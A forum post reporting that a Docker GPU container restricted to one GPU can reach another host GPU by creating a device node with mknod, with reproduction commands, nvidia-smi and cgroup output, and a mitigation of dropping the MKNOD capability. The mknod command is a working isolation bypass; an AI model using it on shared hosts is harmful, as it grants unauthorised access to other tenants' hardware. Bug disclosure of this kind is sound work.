GPU container can get the permission of other GPUs on the host

pokerfacesad · November 5, 2020, 6:44am

1. Issue description

The GPU container can break the isolation to get the permission of other GPUs on the host

2. Steps to reproduce the issue

start a GPU container, and attach /dev/nvidia0

$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0  nvidia/cuda:10.1-runtime-ubuntu16.04 bash

the container can access the GPU as expected

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

the cgroup setup c 195:0 rw is also as expected

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

BUT
if I create other GPU device files with GPU0’s major/minor number, something unexpected will happen.

root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0

the /dev/nvidia1 with the nvidia0 's device number create successfully

root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236,   0 Oct  9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236,   1 Oct  9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195,   0 Oct  9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195,   0 Nov  4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct  9 01:32 /dev/nvidiactl

the GPU1 can be listed by nvidia-smi unexpectedly

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

and the cgroup setup doesn’t change at all

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

I have run a tensorflow demo in the container, these 2 GPUs can indeed be used.

This problem can be avoid be add arg --cap-drop MKNOD for docker run , but docker container has the MKNOD cap by default.

And it seems like this operation can trick cgroup to get the permission of other GPUs on host.

It’s a big risk.

Topic		Replies	Views
Docker can only see GPUs with --privilidged flag General docker	0	268	September 12, 2024
Applications not using GPU inside the container General	4	2125	April 12, 2024
Not able to run a NVIDIA docker container using gpus and without sudo Compose docker	2	1367	September 12, 2023
I would like to have some informations about the passthrough of my NVIDIA graphic card on a docker container on Windows General docker	0	621	May 7, 2021
Run docker nvidia container with limiting GPUS and systemctl using privileged Docker Hub dockerhub , docker	0	1200	December 4, 2020

GPU container can get the permission of other GPUs on the host

1. Issue description

2. Steps to reproduce the issue

Related topics